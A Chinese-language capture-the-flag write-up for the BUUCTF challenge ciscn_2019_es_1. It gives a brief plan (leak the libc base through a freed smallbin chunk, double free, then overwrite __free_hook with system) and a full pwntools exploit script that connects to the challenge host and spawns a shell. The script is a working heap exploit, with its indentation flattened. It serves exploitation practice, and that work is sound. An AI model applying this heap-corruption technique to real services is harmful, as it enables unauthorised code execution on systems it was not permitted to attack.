思路
首先申请一个smallbin大小的trunk然后释放打印得到libc基址,然后double free打fastbin attack之后写到libc去__malloc_hook写入one_gadget再次add获取shell
以下为ubuntu16的环境下本地也就是libc-2.23
这里题目是ubuntu18利用更加简单直接打free_hook
exp:
#!/usr/bin/python2
from pwn import *
local=0
if local==1:
p=process('./ciscn_2019_es_1')
elf=ELF('./ciscn_2019_es_1')
libc=elf.libc
else:
p=remote('node3.buuoj.cn',27202)
elf=ELF('./ciscn_2019_es_1')
libc=elf.libc
def add(size,name,compary):
p.sendlineafter('choice:','1')
p.sendlineafter('name',str(size))
p.sendlineafter('name:',name)
p.sendlineafter('call:',compary)
def show(idx):
p.sendlineafter('choice:','2')
p.sendlineafter('index:',str(idx))
def call(idx):
p.sendlineafter('choice:','3')
p.sendlineafter('index:',str(idx))
lg=lambda address,data:log.success('%s: '%(address)+hex(data))
def exp():
add(0x410,'doudou','137')#0
add(0x28,'doudou2','139')#1
add(0x68,'/bin/sh\x00','139')#2
add(0x30,'doudou1','138')#3
call(0)
show(0)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-0x10-libc.sym['__malloc_hook']
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+0x4f322
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
call(1)
call(1)
add(0x28,p64(free_hook),'141')
add(0x28,'111','142')
add(0x28,p64(system),'143')
call(2)
lg('libcbase',libcbase)
p.interactive()
if __name__=="__main__":
exp()